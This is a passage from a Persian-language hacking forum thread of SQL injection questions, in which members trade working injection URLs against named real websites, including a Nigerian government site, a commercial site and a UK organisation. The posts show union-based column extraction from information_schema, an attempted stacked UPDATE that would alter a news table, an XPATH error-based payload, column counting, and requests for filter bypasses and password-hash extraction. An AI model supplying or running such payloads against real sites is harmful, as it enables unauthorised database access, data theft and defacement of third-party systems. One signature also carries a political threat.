انجمن گروه آشیانه - آموزش امنیت و راه های مقابله با هک
دوره آموزشی آشیانه آدرس رسمی کانال تلگرام گروه آشیانه
انجمن آموزشی لینوکس سیسکو ویپ استریسک الستیکس میکروتیک آشیانه هاست ارائه دهنده میزبانی وب امن؛ سرورهای اختصاصی و مجازی
صفحه 1547 از 1547 نخستنخست ... 547 1047 1447 1497 15371538153915401541154215431544154515461547
نمایش نتایج: از 23,191 به 23,199 از 23199

موضوع: [تاپیک] جامع سوالات SQL Injection

  1. Top | #23191

    تاریخ عضویت
    Jun 2012
    میانگین پست در روز
    0.69
    نوشته ها
    1,258
    تشکر
    2,078
    تشکر شده 6,771 بار در 1,092 ارسال
    ميزان امتياز: 16545Array
    نقل قول نوشته اصلی توسط HarpigIE نمایش پست ها
    سلام

    و همچنین این چرا اینجکت نمیشه؟!

    کد PHP:
    http://emdi.gov.ng/announcement.php?id=-104' union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name='news'%23


    http://emdi.gov.ng/announcement.php?id=104;%20upDAte%20ng1di1go_emdiweb.news%20sEt%20description=2%20WhERe%20id=100%23


    http://emdi.gov.ng/announcement.php?id=100 
    مورد دوم اینجکتش مشکلی نداشت احساس کردم باید ورودی به صورت hex باشه که در این مورد جواب داد و خروجی رو دیدیم :
    کد:
    http://emdi.gov.ng/announcement.php?id=-104' union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=0x6e657773--+-
    id,announcement,description,url,post_date


    متاسفانه عجله ای شده مورد اول رو تست نکردم دوستان ریپلای میدن .

    موفق باشید.
    ویرایش توسط V For Vendetta : 06-22-2017 در ساعت 11:02 PM
    [برای مشاهده لینک ها شما باید عضو سایت باشید ]
    [برای مشاهده لینک ها شما باید عضو سایت باشید ]
    TelegramBot , Webdesign , Pentest
    feel free to contact me at pm

  2. 5 کاربر مقابل از T3rm!nat0r5 عزیز به خاطر این پست مفید تشکر کرده اند.


  3.  

  4. Top | #23192

    تاریخ عضویت
    Oct 2015
    میانگین پست در روز
    0.07
    نوشته ها
    43
    تشکر
    236
    تشکر شده 54 بار در 19 ارسال
    ميزان امتياز: 5583Array
    نقل قول نوشته اصلی توسط T3rm!nat0r5 نمایش پست ها
    مورد دوم اینجکتش مشکلی نداشت احساس کردم باید ورودی به صورت hex باشه که در این مورد جواب داد و خروجی رو دیدیم :
    ممنون از پاسختون اما منظور بنده update کردن بود که توو دومین URL آوردمش.

    ستون ها مشکلی نداشت و براحتی بدست اومد.

    You will not see 25 years from today! By Allah's favor and grace, nothing called the Zionist regime will exist by 25 years from now
    Sep 9, 2015




  5. Top | #23193

    تاریخ عضویت
    May 2014
    میانگین پست در روز
    0.92
    محل سکونت
    بندرعباس
    نوشته ها
    1,044
    تشکر
    3,771
    تشکر شده 5,718 بار در 883 ارسال
    ميزان امتياز: 38191Array
    نقل قول نوشته اصلی توسط HarpigIE نمایش پست ها
    ممنون از پاسختون اما منظور بنده update کردن بود که توو دومین URL آوردمش.

    ستون ها مشکلی نداشت و براحتی بدست اومد.
    درود

    ببینید دوست من توی سایت های php خیلی خیلی کم پیش میاد که بشه از دستور اپدیت یا بقیه دستورات

    استفاده کرد دلیلش هم اینه چون برنامه نویسان معمولا از تابع mysqli_query استفاده میکنن و این تابع

    قابلیت جدا کردن دستورات با سمی کالن رو نداره پس در نتیجه فقط میتونه یه کویری ارسال کن که اون

    کویری هم کویری اصلی پیج هست...

    اما خیلی از دوستان میپرسن توی php میشه اپدیت کرد ای اینرسنت یا هر کاره دیگه ای که همیشه جواب

    میدیم نمیشه اما فکر میکنم اگه مثلا برنامه نویس insertکرده باشه و نام تیبل هم خوده ورودی باشه

    میتونیم insert کنیم(البته مطمن نیستم) البته اگه همچین حالتی پیش بیاد باید کلی کلی بگردیم همچین

    تارگتی پیدا بشه...

    یا علی
    گاهی به دل دریا میزد
    گاهی با گل کنار دریا میرفت
    داستان به موج عشق رسید
    دریا حرف از فردا میزد
    دریا رفیق تنهایی هاش
    با اون نگاش
    حرفایی داشت
    Now is the time Chris F.SQLi dead

  6. 4 کاربر مقابل از Chris عزیز به خاطر این پست مفید تشکر کرده اند.


  7. Top | #23194

    تاریخ عضویت
    Feb 2015
    میانگین پست در روز
    0.07
    نوشته ها
    57
    تشکر
    177
    تشکر شده 19 بار در 7 ارسال
    ميزان امتياز: 0Array
    دوستان همكاری كنید خواهشن اینو میخوام انجكت كنم ولی من دستی بلد نیستم
    [برای مشاهده لینک ها شما باید عضو سایت باشید ]

  8. Top | #23195

    تاریخ عضویت
    Jul 2013
    میانگین پست در روز
    0.34
    نوشته ها
    493
    تشکر
    5,251
    تشکر شده 5,275 بار در 486 ارسال
    ميزان امتياز: 69085Array
    نقل قول نوشته اصلی توسط helsec نمایش پست ها
    دوستان همكاری كنید خواهشن اینو میخوام انجكت كنم ولی من دستی بلد نیستم
    [برای مشاهده لینک ها شما باید عضو سایت باشید ]
    سلام

    دوست عزیز اگه بلد نیستید خب میتونید شروع کنید یاد بگیرید..وقتی آموزش هارو دیدید و شروع به تمرین کردید هر جا مشکل داشتید یا حتی اگه یه بخشی از آموزش رو متوجه نشدید میتونید در این تاپیک مطرح کنید تا دوستان راهنمایی کنند. این تاپیک مربوط به مشکلات SQL Injection کاربران هستش نه اینجکت کامل تارگت ها یا آموزش قدم به قدم اینجکت. .. همه چی تو این انجمن برای یادگیری حداقل فقط SQL Injection محیاست حالا دیگه بستگی به شما داره بخواید یاد بگیرید یا نگیرید.

    تاپیک آموزشی هم تا دلتون بخواد هست برای نمونه :

    [برای مشاهده لینک ها شما باید عضو سایت باشید ]

    متد مورد استفاده : XPATH
    کد:
    http://www.sulamar.com/en/newsDetail.php?newsID=1%20and%20extractvalue(0x00,concat%0b(0x7e,@@version))%20--%20-&newsTypeID=2
    بقیه اشو میتونید طبق آموزش ها پیش برید.

    Good Luck../
    Violence can be used for good.

    [برای مشاهده لینک ها شما باید عضو سایت باشید ]

    Beneath this MASK there is more than flesh
    Beneath this MASK there is an IDEA,...
    And IDEAS are BULLETPROOF
    .
    V For Vendetta

    فقط قدرت است که میتواند جلوی قدرت را بگیرد.


  9. 7 کاربر مقابل از V For Vendetta عزیز به خاطر این پست مفید تشکر کرده اند.


  10. Top | #23196

    تاریخ عضویت
    Mar 2016
    میانگین پست در روز
    0.47
    نوشته ها
    226
    تشکر
    263
    تشکر شده 311 بار در 98 ارسال
    ميزان امتياز: 1485Array
    سلام عزیزان
    تارگت زیر 10 ستون داره انگار... ولی ستون اسیب پزیر رو نشون نمیده. بیزحمت راهنمایی کنین.

    کد:
    http://www.teg.org.uk/index.php?id=3,58 order by 10--+

  11. کاربر مقابل از ashotboy عزیز به خاطر این پست مفید تشکر کرده است:


  12. Top | #23197

    تاریخ عضویت
    Mar 2014
    میانگین پست در روز
    0.23
    محل سکونت
    Underground .
    نوشته ها
    271
    تشکر
    553
    تشکر شده 632 بار در 169 ارسال
    ميزان امتياز: 1317Array
    نقل قول نوشته اصلی توسط ashotboy نمایش پست ها
    سلام عزیزان
    تارگت زیر 10 ستون داره انگار... ولی ستون اسیب پزیر رو نشون نمیده. بیزحمت راهنمایی کنین.

    کد:
    http://www.teg.org.uk/index.php?id=3,58 order by 10--+

    با سلام

    خب وقتی با دستور Order جواب نمیده با دستور Group بررسی کنید :

    کد:
    http://www.teg.org.uk/index.php?id=3,58+group+by+10
    کد:
    http://www.teg.org.uk/index.php?id=3,58+group+by+11
    تعداد ستون ها "10"

    موفق باشید .


    --Update--

    منظور شما رو الان متوجه شدم ؛ عذرخواهی می کنم . ستون آسیب پذیر رو به محض یافتن قرار خواهم داد .
    ویرایش توسط Big Banger : 06-26-2017 در ساعت 12:18 AM
    <span class= [برای مشاهده لینک ها شما باید عضو سایت باشید ]" border="0" />

    [برای مشاهده لینک ها شما باید عضو سایت باشید ]

  13. 3 کاربر مقابل از Big Banger عزیز به خاطر این پست مفید تشکر کرده اند.


  14. Top | #23198

    تاریخ عضویت
    Jan 2016
    میانگین پست در روز
    0.13
    نوشته ها
    69
    تشکر
    437
    تشکر شده 109 بار در 27 ارسال
    ميزان امتياز: 611Array
    لطفا بایپس اینو بگید

    [برای مشاهده لینک ها شما باید عضو سایت باشید ]

  15. Top | #23199

    تاریخ عضویت
    May 2016
    میانگین پست در روز
    0.13
    نوشته ها
    54
    تشکر
    26
    تشکر شده 7 بار در 7 ارسال
    ميزان امتياز: 0Array
    سلام یه سوال دارم بعضی از تارگت ها هستن که تنها راهشون ارور بیس هست ولی پسورد هش هست و ارور بیس محدودیت نان دادن طول داره .البته به غیر از polygon که متاسفانه ورژن مورد نظر من ساپورت نمیکنه
    آیا به غیر از بلایند روش دیگری سراغ دارید؟ با تشکر

صفحه 1547 از 1547 نخستنخست ... 54710471447149715371538153915401541154215431544154515461547

موضوعات مشابه

  1. تاپیک سوالات نرم افزار موبایل
    توسط mohammadf255 در انجمن نرم افزار موبایل
    پاسخ: 111
    آخرين نوشته: 04-04-2017, 12:14 AM
  2. تاپیک جامع آموزش تزریق به بانک اطلاعاتی SQL Injection
    توسط Pythagoras در انجمن تست نفوذ و امنیت دیتابیس ها
    پاسخ: 3
    آخرين نوشته: 05-14-2014, 06:24 PM
  3. [تاپیک] جامع سوالات SQL Injection
    توسط ERroR در انجمن سوال و جواب های عمومی کامپیوتر
    پاسخ: 1186
    آخرين نوشته: 03-11-2010, 02:15 AM

کلمات کلیدی این موضوع

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •  
شبکه های اجتماعی
تلفن های شرکت
شماره های تماس: 6-88749724-021
درباره گروه امنیتی آشیانه

گروه امنیتی آشیانه گروهی شخصی و کاملا مستقل بوده و به تائید سایت معتبر Alexa اولین و بزرگترین سایت امنیت شبکه در ایران است. همچنین کلیه حقوق اطلاعات و مقالات در این سایت متعلق به گروه امنیتی آشیانه بوده و هرگونه نسخه برداری از آن بدون ذکر منبع پیگرد قانونی خواهد داشت.